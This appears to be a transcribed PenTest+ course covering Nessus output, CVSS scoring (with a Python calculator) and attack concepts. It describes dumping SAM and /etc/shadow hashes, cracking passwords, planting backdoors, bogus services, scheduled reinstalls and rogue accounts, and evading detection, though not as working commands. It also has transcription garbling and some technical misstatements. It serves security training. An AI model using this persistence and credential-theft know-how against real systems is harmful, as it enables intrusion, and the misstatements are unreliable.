target. Now this output is very important for the plugin to know what's going on, and also for you as a pen tester and your client to know, hey, why did this plugin actually give me this result? Why does it say that it's critical? Well, it was based on some information that it was able to pull from that device. References: links to give you more information about that. If it's just information or if it's an actual vulnerability, it will give you references to those vulnerabilities, so if it's a Common Vulnerabilities and Exposures vulnerability, a CVE, it will give you a link to that CVE, and it may give you some other links. And most importantly, at least on our side, since we are now taking the side of a client, we have to observe risk and vulnerability information, and this is going to be our focus in this module, okay: how to analyze the information that the vulnerability scanner shows to us in regards to how risky and how vulnerable our system is. Okay, so this was retrieved from the previous module, right? So if you remember, I actually executed a scan against my own machine and also my modem, and my modem was running Apache version 2.4.41, and we remember that it was a high vulnerability that was identified by Nessus, right? And this was the output. So all those sections that I mentioned over here we can see over here. So here's the summary, okay, this is the information with more details, solution; we can see that the solution here is actually pretty easy, right, so just upgrade to Apache version 2.4.44 or later, which actually is not
quite the solution because um well in this case it is but we also had an other vulnerability which was a medium and it was saying that hey you have to update it upgrade it to 2.4.42 but if you upgrade it to 2.4.42 then you'd still have this vulnerability here so that is something that may occur you have more than one alert associated with the same problem with the same vulnerability okay and it's also very important to take a look here and observe that in the description it mentions these cves right we can see here that
Apache HTTP server 2.4.32 to this version here there is a specific module called mod proxy uwsgi information disclosure uh is possible and it can be exploited by the because of this vulnerability here that is described by this cve now also another existing vulnerability which is exists in Apache server 2.4.20 to 2.4.43 when trace or debug was enabled for HTTP 2 version 2 module on certain traffic Edge patterns login statements were made on the wrong connections causing and concurrent use of memory pools configuring the log level of mod HTTP 2 above info will mitigate this vulnerability
for unpatched servers so this vulnerability is also described here and then we see another one here described by another cve okay some other information that we also saw was the plugin details so it says here what's the severity identified by the successful execution of this Plugin or exploitation of this vulnerability so it's high that's the ID the plugin ID okay that's the plugin version type remote which means that this plugin can remotely exploit that vulnerability and we're gonna see that this is actually very critical okay so this information is critical um we're gonna see that
when we analyze the CVSs base score family so web servers that's in case you remember from last class from our last module we saw that we have the family the plug-in families okay so this plugin belongs to the web server's family so that's when it's been published and that's when it's been modified okay some other information we already saw that so the solution is to upgrade the Apache server version to 2.4.44 or later that's the output so the server actually sent it's um hello it sent its flag to the plugin so that's how the plugin
was able to capture the version so the installed version is 2.4.41 the fixed version is 2.4.46 okay the port that runs the service is port 80. in that host 10.0.2.2 now reference information as I mentioned those are the cves that describe these vulnerabilities okay so keep that in mind we have only one plugin here flagging alerts but this plugin does not only exploit does not only identify one vulnerability but three vulnerabilities all of these vulnerabilities are associated with the same problem which is version you have to upgrade Apache in this case but they are different
vulnerabilities and this is what we'll be focusing on in this class so risk information and vulnerability information okay so here mostly in Risk information you can see many lines here right so risk factor it says that this vulnerability or vulnerabilities are high okay based on what that's what we're going to discuss here we can see here that the CVS version 3 base score is 9.8 the CVS V3 Vector is and then you see there all those letters we're going to understand that as well um we don't have to worry about the temporal Vector so let's
just go down there and take a look at this CVS base score which is 7.5 now why do we see two CVS base scores two different CVS basis scores here well that's because the CV we have different versions of the CVS s base score okay so the one at the bottom right here if we go down and take a look at it here we can see that this is this base score here is associated with CVSs version 2 whereas this CVS basis score here is associated with CVS S3 okay and once again we will also
understand what the CVSs Vector is actually it's the CVSs Vector that will point out to our base score our CVSs base score okay now in which base score or which CVSs version should I rely on well it varies it may vary so um it will actually depend on the plugin on the software on the vulnerability scanner that you're running okay so for example we can see here that nasus was able to give you the base score for both versions version 3 and version 2. well not quite uh it wasn't quite um nurses that was able
to do it but actually the the plugin was able to pull the information used by nasus to generate that classification now what is most importantly here is that it doesn't matter whether it's CVSs 2 or 3 we can see that the risk factor is high so basically the difference between versions 2 and 3 is the range of that score but they will it doesn't matter which version it is the risk will always falling the same classification for example here we can see that version 2 the base score is 7.5 whereas in three it's 9.8 but
both of them are high now we also have here vulnerability information okay so that's the the the the the the some additional information about the vulnerability itself not about the risk okay now why is this also important why is this section here also important because if it is a vulnerability that there is a known um exploit that you can um that you can use to exploit that vulnerability then it can just show you a text here or even give you a a link you click there and you go directly to a web page that will
allow you to download the exploit file basically you just have to run that exploit obviously there are some exploits that they are fancier so they require some additional knowledge but many many situations exploits are very simple exploit files are very simple to execute to run but that's which is not the case here this is not a simply exploitable vulnerability this is a vulnerability that can give information to the attacker based on the uh uh on the retrieval of data not specifically it's different from a dni of service attack denial of Services of service attacks usually
are performed by simply running that exploit okay now the common vulnerabilities is scoring system or the so-called CVSs that I mentioned many many times okay so the the way that nist came up with this CVSs was so they thought okay we need to create some kind of classification now to classify these vulnerabilities we have to give them scores points how can we score these vulnerabilities okay there are different areas different different metrics that we can analyze in order to classify a vulnerability right so that was their thought they came up with a solution or at
least a set of metrics which are the attack vector d-axis complexity Authentication confidentiality impact integrity and availability impact and you can see between parentheses that we have a representation of each of those metrics or impacts attack Vector is represented by AV axis complexity AC authentication Au confidentiality impact C Integrity impact I availability availability impact a if we go back right here we can see that we have those letters right there AV attack Vector right and then you have the value which we're gonna see the value for attack Vector access complexity authentication Integrity complexity so these
are the metrics that we have now they decided that each of these metrics should be graded they should receive a score some points according to how critical they are or not so let's take a look at that so the attack Vector represents How It's associated with the criticality of the location of that Target so if a Target let's say that you have a vulnerability and this vulnerability exploits a Target that is local that means that that vulnerability will receive a score of 0.395. now you don't have to worry you don't have to be concerned about
these points the these scores that are described here first of all I'm taking CVSs version 2 as an example to generate to illustrate these points these scores you don't have to know to memorize these scores also because nist itself they have a calc online calculator that you just go there and you select so for example the attack for the attack vector is it a an exploit that can only exploit vulnerabilities or is it a vulnerability I'm sorry that is valid for a the local machine is it valid for adjacent machines which means machines that are
directly connected via network but directly connected to the machine that actually is actually exploiting that vulnerability or can you remotely use that exploit that vulnerability from anywhere for example from the public net or the internet so if it's a local attack Vector then you have that score if it's adjacent you have 0.6446 for example or network that's mostly the most critical one the score is going to be one once again if it's CVSs version 2 but it doesn't matter so these letters here l a n again if we go back there we can see that
the attack Vector here is n which represents Network as we can see right here so that vulnerability from the attack Vector standpoint is very very critical it has the higher grade the higher scroll score and you you must keep in mind that the score ranges from 0 to 10 and as higher as it gets more critical it is now the next metric that we have to look at is excess complexity so if the complexity to access that vulnerability is high well if it's very very difficult to actually exploit that vulnerability then the the score is
low which may be may sound confusing but you have to look at the access it's the axis complexity which means how difficult it is to successfully exploit that vulnerability if it's medium higher score low l so those are the letters high medium low and it's the opposite High gets the lowest score medium is medium and low gets the highest score for this metric here now we also have authentication we can have multiple M single s or none and once again it may sound confusing but it's actually the opposite the authentication means the number of authentication
systems that the um the vulnerability must have access to must successfully authenticate in order to exploit which means if it's an ex if it's a vulnerability that can only be executed or can only be exploited without any authentication that means that there is no authentication then the score is high if there is a single point of authentication single if there are multiple authentication systems then the it's very gets difficult to successfully exploit that vulnerability which means that the score is slow then we have confidentiality none and partial p complete c what does it stand for
so in case once let's say that vulnerability is successfully exploited even if it's exploited is any confidential data going to be made available to the attacker no so there is no compromise in confidentiality which means that okay no score if the information is made available to the attacker but that information is not important okay so it's partial but if the well rephrasing not actually important but if that information uh is just a piece of information that cannot be used used by the attacker then it's partial but it's a complete information just by that information the
attacker can uh gather get somewhere then it's complete which means that it gets the higher score so n p and C okay that's confidentiality and we have the same for integrity okay so if compromised the information the data remains unchanged um if it's partial or if it's complete and same same thing for availability okay none and partial p and C for complete availability which means none if the the vulnerability is exploited well the system remains available if there is a disruption in let's say in a service or just a partial disruption but if this service
or the host um is goes down fully entirely let's say if you have a dni of service attack then the availability metric goes to complete C and it gets the higher score so once again let me go back there and we've if we take a look at the CVSs vector that's what we have in this case I'm illustrating CVSs version 2. so um the attack Vector is Network the access complexity is low Authentication is none confidentiality is p which means partial same thing for integrity and availability availability also partial okay so we have those scores
but if we simply add up these points We're not gonna get to the same CVSs basis chord that is Illustrated there okay now why because we have weights for each of these metrics so the CVSs basis core is actually actually calculated by this formula here so 0.6 times the impact plus 0.4 times exploitability minus 1.5 all that plus the impact function and what are these what is impact what is exploitability what is impact function and here it is so the impact is 10.41 times so that that's it's that formula that you can see right there
we also have the exploitability which is right there okay so the impact takes in consideration confidentiality integrity and availability whereas exploitability takes in consideration a tech Vector excess complexity and authentication okay and then finally based on the impact we have the impact function which is zero in case impact is zero or 1.176 otherwise which means in case the impact is higher than zero now once again keep in mind that this CVSs basis score here a this calculation considers CVSs version 2. it's a little bit different for CVS as version 3 but you are not to
worry about it for two main reasons the CompTIA pentas plus exam is not actually going to ask you to do this do this calculation what it wants you to know is the categories which we're going to take a look at right now and also so that's one reason the only reason is because we have as I previously mentioned we have the online calculator which is um in the nist website and there it is so here's the link right here that's the URL where you can see information about the this these tables the categories and also
you can get access to the online calculator okay now this is what you have to know for the CompTIA pentas plus exam okay and this been extracted from the nist website okay so if we take a look at the CVSs version 2 ratings or categories we have low medium and high low if it ranges from ranging from 0 to 3.9 medium from 4 to 6.9 high from 7 to 10. CVSs base score version 3 none so we have two new classifications here none if it's zero low ranging from 0.1 to 3.9 medium 4.026.9 high 7.02
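As an added example (not code from the video), here is the CVSS v2 base score calculation above carried out in Python: it parses the vector string read off the Nessus output, applies the metric weights, and maps the result onto the v2 and v3 rating bands just listed. The weights, the rounding rule and the vector format are taken from the CVSS v2 specification and are assumptions beyond what the page states; the video only quotes three of the attack vector weights.

```python
"""CVSS v2 base score from a vector string such as AV:N/AC:L/Au:N/C:P/I:P/A:P."""
import math

# Metric weights from the CVSS v2 specification (assumption: not all are quoted on the page).
AV = {"L": 0.395, "A": 0.646, "N": 1.0}       # attack vector: local, adjacent, network
AC = {"H": 0.35, "M": 0.61, "L": 0.71}        # access complexity: high, medium, low
AU = {"M": 0.45, "S": 0.56, "N": 0.704}       # authentication: multiple, single, none
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}      # confidentiality / integrity / availability impact

EXPECTED = ("AV", "AC", "Au", "C", "I", "A")


def parse_vector(vector: str) -> dict:
    """Split 'AV:N/AC:L/Au:N/C:P/I:P/A:P' into {'AV': 'N', ...}, refusing incomplete vectors."""
    metrics = {}
    for part in vector.split("/"):
        name, _, value = part.partition(":")
        metrics[name] = value
    missing = [m for m in EXPECTED if m not in metrics]
    if missing:
        raise ValueError(f"vector is missing metrics: {missing}")
    return metrics


def round_to_1_decimal(x: float) -> float:
    """CVSS rounds half up to one decimal; math.floor avoids Python's banker's rounding."""
    return math.floor(x * 10 + 0.5) / 10


def base_score_v2(vector: str) -> float:
    """Impact and exploitability sub-scores, combined with the weighted v2 base equation."""
    m = parse_vector(vector)
    impact = 10.41 * (1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]]))
    exploitability = 20 * AV[m["AV"]] * AC[m["AC"]] * AU[m["Au"]]
    f_impact = 0.0 if impact == 0 else 1.176        # the "impact function"
    # Per the spec the weighted sum is multiplied by f(impact).
    score = ((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact
    return round_to_1_decimal(score)


def rating_v2(score: float) -> str:
    """CVSS v2 qualitative bands: Low 0-3.9, Medium 4-6.9, High 7-10."""
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    return "High"


def rating_v3(score: float) -> str:
    """CVSS v3 bands: None 0, Low 0.1-3.9, Medium 4.0-6.9, High 7.0-8.9, Critical 9.0-10."""
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


if __name__ == "__main__":
    # The vector read off the Nessus finding discussed above.
    vector = "AV:N/AC:L/Au:N/C:P/I:P/A:P"
    score = base_score_v2(vector)
    print(f"{vector} -> v2 base score {score} ({rating_v2(score)})")
    # The same finding's v3 score, shown against the v3 bands.
    print(f"v3 base score 9.8 -> {rating_v3(9.8)}")
```

Running it reproduces the 7.5 shown in the scanner output for the vector above, and shows that the 9.8 v3 score lands in the Critical band that only exists in v3.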
So if we go back there again, when we ran Nessus in our previous module, module 4, that's the kind of result that you can get, and that's how you interpret that information. Now, what are some of the types of vulnerabilities that may exist, that we may find, and that will generate these scores? Meaning, what are the critical vulnerabilities that we can find, or at least the most common ones, which usually are associated with the most critical ones?

So, some examples. Outdated systems, outdated devices, unsupported devices: there is a big difference. Outdated systems, for example, or outdated software, are software that was not updated, so they're outdated; unsupported are those that are not being supported by their manufacturer or developer anymore, for example Windows 7, it's unsupported. Buffer overflow: a buffer overflow is an attack that is very much used, it is still very much used, but not much software is vulnerable to this type of attack anymore. But anyway, a buffer overflow is an attack that happens when a specific type of data is sent to the software in a way that the software does not properly manage that data; that data can be reallocated to another space of memory, and it will cause that software to disrupt or crash another software, or even the entire machine itself. So the machine can crash just because a piece of software was not properly designed. Privilege escalation: that's when you get access with a user, usually with a guest user or with a very limited user, and then from that user you can escalate, get access to more privileged users. Shellcode: shellcode is also a very common type of attack, and very resourceful, very useful and also very successful. So in a very simplistic way, a shellcode attack is simply an attack where you run a code, and for some reason (there is a technical reason, but it differs on different occasions) you can get access to the system as the administrator. So for example, if the operating system has a shellcode vulnerability, if you get access to that system you can run that exploit; usually it's exploited by an exploit, you can simply run that exploit and boom, you become an admin user.

Insecure protocols: protocols that are not secure, that do not use cryptography. So for example, telnet is a very ancient protocol, but it's still around. We're going to mention another one, which is DNS, but DNS must be mentioned separately because it's very critical. There are other protocols: FTP, for example, is another one, SNMP versions 1 and 2c (not version 3), the NTP protocol is another one; so there are many protocols that are not known for their security resources. Certificates: expired certificates or invalid certificates, these are huge problems, and the reason why is, for example, you may remember that after you installed Nessus and you accessed https://localhost:8834, it showed to you, hey, you're trying to access a web page here that has a certificate, but it's not recognized, it's not a valid certificate. What is the problem there? The problem is that you are accessing a web page that says that all the information that is transmitted there will be encrypted; however, you don't know that you are actually accessing the web server that you want to access, so you could very well be accessing a server that is not the server that you want to access. DNS: the reason why I mentioned DNS separately is because DNS can lead an attacker to different types of attacks, DNS spoofing being the most well-known one. Actually the Domain Name System protocol is known as a very flawed protocol, it's full of flaws, it's full of holes, and that is actually why DNSSEC is another protocol, or an extension of the DNS protocol, because DNS is a protocol with many holes.

Information disclosure: well, obviously, information being made available when it shouldn't, and that is something that the vulnerability that we were able to find in my modem allows an attacker to do. Because of the version of the web server, the Apache HTTP web server, an attacker can gather information that he or she is not supposed to. Misconfiguration: also very common, and that's only because it's configured by us, human beings, and we are full of flaws, so we commit errors, we make mistakes. IoT: well, I generalized network devices, or non-traditional network devices, as IoT, but that's because I want to associate it with, let's say, your fridge, your air conditioner, your UPS, any device that is connected to the network, that is TCP/IP enabled, but is not a common, traditional network device: it's not a router, it's not a desktop, it's not a switch, it's not a modem, it's not a mobile phone, not a laptop, nothing like that. So we can generalize these as appliances. Now, why is it growing so much, why do we list it here among common vulnerabilities? Well, because that's exactly what's going on: these appliances are growing every day, they are being very well accepted by residents, by people, by the population. So for example, any air conditioning system nowadays will probably come with the TCP/IP stack enabled; the same thing is valid for smart TVs, for example, actually that's the characteristic of a smart TV; same thing for fridges and so many other appliances. Injections: there are several different types of injection. You have LDAP injection, but the most famous one and most exploited one is SQL injection, or "sequel" injection if you prefer, and we are actually going to take a better look at that in another module because it's so important. Cross-site scripting: that is another type of attack that we will look into. This is a type of attack where an attack, or a code, is inserted into the server to attack the client. So it's very common to see this type of attack happening via forums; maybe you faced this at some point in your life, where you tried to access a web page, usually a forum, and when you accessed it your antivirus popped up a window saying, hey, you shouldn't access this web page, there is some suspicious code in here. So that's exactly what this type of attack does: it uses code that's been inserted into a web page to be sent to the client, and then the attacker can leverage their attack.

So in this module, in this specific video, we discussed, actually we focused on, the CVSS base score. Our goal was to understand what that score means, so we learned that that score will tell us how critical a vulnerability is, if it is indeed. Now, the reason why it's so important, once again, is because it will help your client, or the staff that is responsible to address those flaws, to create a schedule and then come up with a sequence of assessments in order to fix all those flaws; there must be a priority. We also discussed the most common vulnerabilities, and this is all going to be very helpful for the continuation of our course. I hope you enjoyed this video. Thank you very much.

Hello. In this module we are going to discuss some types of exploits, and the reason why we have to understand these types is because, well, first of all, our first step after, or at least the step once we're done with the vulnerability scan, is to actually determine which exploits we're going to use, if we've found exploits, right, or vulnerabilities: which exploits, if available, we're going to use. And in order to define that we have to consider their CVSS base score, so we have to analyze how critical the vulnerabilities that we found are. Once we can identify that, we have to first determine: okay, so this is what I'm going to do, these are the vulnerabilities that I'm going to exploit, if I have those available. Now, in order to do that I have to understand those vulnerabilities; before I can actually exploit, I have to understand what that vulnerability is about, for very obvious reasons. If I don't know what it is about, I don't quite know what to do once I exploit it; if it's a more difficult to exploit vulnerability, I won't even be able to exploit it. So we have to understand the types that we have. Once we have that in mind, once we know at least some of the more important types of vulnerabilities, then we can actually exploit those vulnerabilities, and once that's done we have our following steps, which is: okay, I've exploited it, what do I do now? Because there are situations where just running the exploit achieves your final goal. So for example, if you're running a buffer overflow attack, well, it's going to crash the machine or the software; if it's a denial of service, same thing. But if it's not, if the idea is to gain access, okay, what do I do once I've gained access to that machine? We're also going to discuss that here as well. And finally we have the post-exploitation phase, which is: okay, I've exploited, I've done something, for example I'm trying to escalate privileges, so I gained access as a regular user and I want to try to become an admin user, just an example. So once that's done, what do I do next? We have to pivot our exploitation phase, which means: okay, we've exploited that device or those devices, but from those devices I can maybe try to get access to other ones. And finally we have to keep in mind that you have to disguise, you have to erase any tracks, so you don't want to be traceable, you don't want even to be seen, right? So when you get access, when you target a machine and you exploit a flaw, you don't want that company, or that client in this case, to know that that actually happened. So we are actually going to go through these phases right now.

So first of all, we have to understand a few types of exploits. The first one is the remote procedure call. It is an old flaw, because most recent operating systems don't work with RPC, at least not generically as it used to be back in the day; many operating systems would use remote procedure calls to run services, to invoke any kind of procedure. Well, because of the RPC security flaws they are not being used that much anymore, but they are still around, so that's one that we have to look into, or at least pay attention to. Another one, now talking more about Windows environments: we also have PsExec. So Microsoft Windows relies on a protocol called SMB, Server Message Block. Now, SMB runs several different protocols, or at least several different services, and one of these services is the one that runs on port 445 to execute remote procedures. Similarly to RPC, Microsoft created their own RPC protocol to establish communication and send instructions to remote Windows environments, other remote Windows environments as well, similarly to RPC. Although you still see the SMB protocol on port 445 for remote commands or remote procedures, they're not being used anymore, although they're still available; the most recent Windows systems disable this service, but if you see that port, you know that that is an entry that you have right there. Another one, similar to PsExec: more recent Windows operating systems started to implement Windows Remote Management, or WinRM, which is similar to PsExec but uses PowerShell to send remote commands. And we have a more generic, and at the same time more complex, system, also for Windows operating systems, which is Windows Management Instrumentation, WMI, which allows you to remotely run everything. So it's not limited to remote commands; you can execute a software, you can schedule a task, you can reboot the machine, you can install software, you can remove software; so basically you get full control of a Windows machine using this instrumentation protocol, or tool.

Scheduled jobs: that is another type of task, actually, that you can run once exploited. Now, keep in mind that this specifically is not an exploit, but this is a task that may be executed once exploited. The idea here would be: okay, I want to make sure that something happens. So I've exploited a vulnerability, I gained access to a machine, I want to make sure that something is executed every now and then. So let's say that I get detected, and the IT staff that was able to detect my presence removed the backdoor that I installed; if I can schedule an event, I can reinstall and reopen that backdoor that I had before. That is just one way of analyzing this possibility. Another protocol: Server Message Block, which is the SMB protocol itself, not only remote procedures through port 445, but the Server Message Block protocol, created by Microsoft, allows Windows machines to exchange not only commands but also messages, share files, share resources such as printers, files, etc. So this is a protocol that has many failures, many flaws, and there are several exploits available for it. And then we have some other remote access software; well, it's most well known for its Windows solutions, specifically the Windows remote desktop tool, or RDP. So one good example that we have is Terminal Services, which comes with any Microsoft server solution; it allows remote desktops to connect to that server and then use that server's resources. So this is a very common resource that Microsoft environments use in order to share resources; therefore people were able to find many vulnerabilities or develop new exploits, and many of those are available. The same thing happens to other software such as this one, so we can think of VNC, TeamViewer and so many others. And we have some other protocols that allow remote execution, such as the graphical remote server, or the X servers for Linux and Unix environments; telnet, although you don't see telnet anymore nowadays, but this is a protocol that you have to at least know about for the CompTIA PenTest+ exam; and SSH, which is the evolution of telnet because basically it does the same thing, or it's been created to do the same thing, allow you to remotely get access to a remote machine, but now using encryption. So that's SSH.

But once you get access, once you exploit a vulnerability and that exploit actually gives you access to that machine, what should you then do, or what could you do then? Well, one first attempt would be to gain privilege, or escalate privilege, meaning if you are a regular user you can try to become a more privileged user, or even become an admin user; if you are a guest user you can try to become a regular user with more privileges than the guest user. You can also try to crack passwords. Now, there are seven different ways that you can try to accomplish this. First of all, if you are in a Windows environment: now, once again, most Windows operating systems are not susceptible to the pwdump attack anymore, but considering that you are targeting desktops as well, it's very common to see desktops with old versions of Microsoft Windows, such as Windows 7 for example, so you can perform pwdump in that type of Windows system, which basically will try to fetch the SAM file, the Windows Security Account Manager file; that's the file that stores user accounts and their hashed passwords. It's not the plain text password, but it's the hashed password, that can then be broken in some situations. So if you can get access to the hashed password, you can use other tools to find out what the plain text password actually is. Similarly, in Linux environments we have the /etc/shadow file; many people talk about the /etc/passwd file, but the /etc/passwd file in a Linux environment is only used to store accounts, not passwords, so the shadow file is the file that actually stores the hashed passwords as well.

And you can also sniff the network, considering that now you have access to a machine; you can sniff the network using that machine. So for example, if you have FTP packets flowing, and if there is someone that is actually in the authentication phase, and if it's FTP, not SFTP, you can actually capture the username and password being transmitted in plain text. Now, you must keep in mind that it's not going to be this simple, because in an FTP transmission probably what is being transmitted is the authentication between a source and a destination, which means that those packets are not arriving at the interface of your vulnerable machine, the machine that you just exploited, so you won't be able to capture that traffic, which actually will demand you to perform an ARP spoofing attack. It's not that difficult to implement, and we're actually going to see that in a following module.

Now, regarding passwords: how can I crack passwords? Again, we are now considering that you got access to the hashed passwords, to the database that actually stores them. Well, you can use software such as Hydra, you can use software such as John the Ripper, and John the Ripper, although it's a very old software, is still pretty accurate, once again as long as you got access to the hashed password database. Now, even if you get access to that hashed password database and a software such as John the Ripper cannot break it, well, you can actually use rainbow tables. So for example, John the Ripper has a limited number of hash algorithms that it supports. What if your version of John the Ripper doesn't support that specific algorithm? What you can try to do is get access to a very large rainbow table. Now, what is a rainbow table? A rainbow table is a file, or a set of files, that will have a correlation of plain text and its hash. So let's say that you have the plain text "password"; what is the hash for "password"? Well, that varies a lot, because it depends on the hashing algorithm, but you can have rainbow tables that generate the hash for the same keyword, the same plain text, using different algorithms. So as you can imagine, it is a very large file, or a very large number of files or tables, with that type of association, but you can then try to match the hashes that you have in the database that you were able to retrieve from that target machine with the rainbow table that you have. And the good news is, well, you can use software to generate rainbow tables, but the good news is that there are many rainbow tables available on the web, and you can just download those.
can just download those.

Now let's say that I was able to exploit a vulnerability, I was able to do whatever I wanted to do: I was able to escalate my privilege, I was able to crack passwords, whatever it is that I wanted to do. Now obviously, if I am a hacker, or even a pen tester, I want to persist. What does that mean? That means that I do not only want to get access to that target that I just got access to in this specific period of time, but I want to be able to come back later, for example, or I want to make sure that I can continue to receive traffic that is being captured, and then I want to receive that traffic by email, for example. So if you want to persist, there are some different ways of doing it.

One, as I previously mentioned, is scheduled tasks or jobs. I want to make sure, for example, that I write a batch script that will constantly, let's say every day, check whether the backdoor that I installed is still there, installed and/or running; if it's not, I will issue another instance of that backdoor. If it's a Linux environment, I can modify inetd, xinetd or systemd. inetd goes back to the very first versions of Linux. These are called super systems. Why are they called super systems? Because they are software, they are systems, that control other services. Now, if I can control a software that controls other services, I can in the end control those services, or I can do even more: I can guarantee that my own service that I created will remain running. I can even do more than that: I can guarantee that the service will be executed as the admin user. So if I get access to these systems, if I can modify these systems, I can simply control the way that other services will be executed.

Which leads us to this other bullet here, which is "add new or bogus services". New services: you create your own service, for example opening a backdoor, so that I can connect later on. Bogus services is, well, let's say that the target machine already has its own services. Right now those are the services that are expected to be running in that machine. I don't want to create new services, because if the admin actually takes a look at the list of services running, that person will see and realize, "hey, this service was not supposed to be here". But if I can change a service in a way that it just continues to run, but now it's also adding something good for me, which is opening a backdoor, well, that will be a lot harder for the admin to realize what's going on. And obviously that's the most traditional way of getting back to a targeted machine, which is installing backdoors, and also a very old technique, which is creating new accounts. I want to make sure that when I get back I have not only my previous account but other accounts, in case something happens: I can create new accounts, I can modify an account. Now, something that you have to keep in mind, and this is very, very important, and it's
also covered by the CompTIA PenTest+ exam. You have to remember, not only as a hacker but as a pen tester as well: derive and disguise. What does that mean? Deriving means pivoting. You exploited one specific device; now you have to derive to others, you have to pivot to other devices. That is just your point of entry; from that point of entry you now have to try to get access to other devices, other networks, other branches, whatever that is, or even other architectures. And you always have to prevent yourself from being detected. Although this is not hacking, this is pen testing, you want to make sure that your client's infrastructure and staff can detect, see and analyze what's going on. If they can't, well, then something has to change, and if that's the case you have to show your client: "hey, I did this and your staff was not able to detect it", so you're not only vulnerable; if you're exploited, you won't even know that it actually happened.

So keep that in mind. You have to know at least some types of exploits; you have to know some ways of gaining privileges, or actions that you can take once you get access to a targeted machine; and once you do whatever you wanted to do, you also want to make sure that you're capable of installing some kind of backdoor, because you want to be resilient, you want to be able to get back to that target once again in the future. And once you've done that, from there you want to pivot, you want to derive to other targets, and keep in mind that you're always focusing on covering your tracks and remaining undetected. I hope you enjoyed this video. Thank you very much.

Hello, this is our module 6, the second video of module 6, and here we're going to see some vulnerability databases, or exploit databases more specifically, and we will also understand why we have to actually get accustomed to this type of website, this type of database. So first of all, in our next video, and probably in the following modules, we're going to use a framework called Metasploitable. So what is the Metasploitable
framework? The Metasploitable framework is a framework that runs an operating system, which can be Linux or Windows 2008, full of vulnerabilities. Now, we have to keep in mind that the goal here is not to actually perform hacks, perform invasions; we're not learning how to become hackers, we're learning how to become pen testers. For that purpose the CompTIA PenTest+ exam requires you to know how to use exploits and how to leverage those exploits in order to test a client's infrastructure. So the goal is not to test whether you're capable of using complex exploits or coming up with complex ideas, complex plans; that's not the case. So the reason why we learn, and actually the CompTIA PenTest+ exam expects you to know, the Metasploitable framework is because this is a framework that you can use to run some tests and improve your knowledge. They're not very much concerned about how complex it is to actually exploit those vulnerabilities.

Now, the Metasploitable that we're going to use is Metasploitable 3. If you don't want to use Metasploitable 3 and you prefer to use Metasploitable 2, that's perfectly fine. The only reason why I bring Metasploitable 3 to you, and I actually advise you to use this one, is because this is the one that we're going to use in this video and the following videos, just to make sure that we are going to have some compatibility here. So that's the website right here where you can download this specific preview of Metasploitable 3. Why is this preview of Metasploitable 3 different from any other? Well, the reason is that this Metasploitable 3, as you can see right here, runs a Windows 2008 server. Traditionally Metasploitables run Linux with, like I said, many vulnerabilities, but we want to test Windows systems. Although at some point we're also going to test Linux systems, mostly we'll test Windows Server systems, because this is what is more available, this is what the industry uses the most, specifically talking about desktops; and although desktops are in higher presence in regards to Microsoft Windows, the vulnerabilities that we're going to see here work for desktop systems, Windows desktops, and Windows servers, at least some versions of those.

So if you come here, you can see the actual link right here. This is at GitHub: github.com/brimstone/metasploitable3/releases/tag/0.1.4. Now, this is the version that we have available at this date, so depending on when you're actually going to do this you may face a different version, and therefore a different link. Now, very important: this Metasploitable here is actually an OVA file. What is an OVA file? It's an Oracle VirtualBox machine file, so you don't actually have to install it. If you search for Metasploitable 3 Windows 2008 server you're going to see some files that you can download, but that will require some interaction from you, some manual work, so you're probably going to have to compile a bunch of stuff. This OVA file here will give you a VirtualBox virtual machine that is complete: you just have to download it and run it, and then you're going to see it there. So that's the link. Once that's done, you're going to have your Metasploitable virtual machine running. We're not going to use it in this video; it's going to be the object of study in our next video. Right now, what I actually want to show you, what I want to present to you, is the vulnerability databases that you have available, or exploit databases that we have available. But before we go there, I want to go back here to Nessus. We learned how to use Nessus in a previous module. Now, this Windows 2008 scan here is the scan that I ran against a Meta
sploitable machine, and when I ran it we can see here that we have 10 critical vulnerabilities, 3 high vulnerabilities, 22 medium, 4 low and a bunch of informational. Obviously I want to take a look at the critical vulnerabilities, right? So out of these critical vulnerabilities here, let me take a look at the first one that we see here, CGI abuses, and it's telling me that there is software running called ManageEngine Desktop Central 10, and there is, as we can see here, a very critical flaw here with a CVSS base score of 10 if it's version 2, a base score of 9.8 if it's version 3, and this is the CVE that is associated with it. So although Nessus does show us a description here, it shows the solution, the output sent by the server, the port that runs that service which is vulnerable to this type of attack, that's on port 8020, and then we have all that information that we already saw in the past, still I don't see too much information here, and that is one of the reasons why we have to know some vulnerability and exploit databases.

First of all, the NIST NVD, the National Vulnerability Database. This is a website that will actually present you, and we know that when we see "National" it means American, so it's a United States vulnerability database, a government project that maintains all reported and official vulnerabilities that are known. Here you can also see some information about exploits, but it's important to know this website because first of all you can come here and search for a specific vulnerability in order to understand what that vulnerability actually is, and also because you have to follow the latest vulnerabilities. If you're becoming a pen tester, you have to be aware of all the new flaws that are coming up. Same thing for exploit databases, such as the exploit-db.com website, also rapid7.com and vuldb.com. Now, what do these three websites have in common? They are focused on exploits: they are not only focused on vulnerabilities, but on the exploits themselves. So for example, if I come here and take a look at this WordPress plugin Autoptimize 2.7.6, what does it do, what is this all about? Oh look, so does this mean that I can actually download the exploit? Well, it can be; you have to actually take a look at it down here. But what is interesting is that you not only have information about the vulnerability but also about the exploit, right? So the exploit title is right down here, a description of that exploit, and then you even have instructions on how to exploit that vulnerability. So this is very, very useful and important information. So, different from the National Vulnerability Database, the American National Vulnerability Database, which has information about vulnerabilities, here you have information about the exploits themselves, so they're actually explaining to you how to leverage that vulnerability. Same thing for these other websites, and this is very, very important for pen testers. As you already know by now, pen testers are not only supposed to know about vulnerabilities, but we must also know how to actually exploit those vulnerabilities.

So in this video we talked about the Metasploitable framework, and now we know that we're going to run it as a VirtualBox virtual machine running a Windows 2008 server instance running many, many services with vulnerabilities, and we also saw some vulnerability and exploit databases, which are very important to you as a pen tester. I hope you enjoyed this video. Thank you very much.

Hello, welcome to our technical hands-on class on exploiting with Nessus. We've seen in a previous module how to use Nessus, and we started to learn in this module some types of exploits that we have available. We also discussed Metasploitable, the Metasploitable framework, which can run a Linux system or Windows system with many vulnerabilities
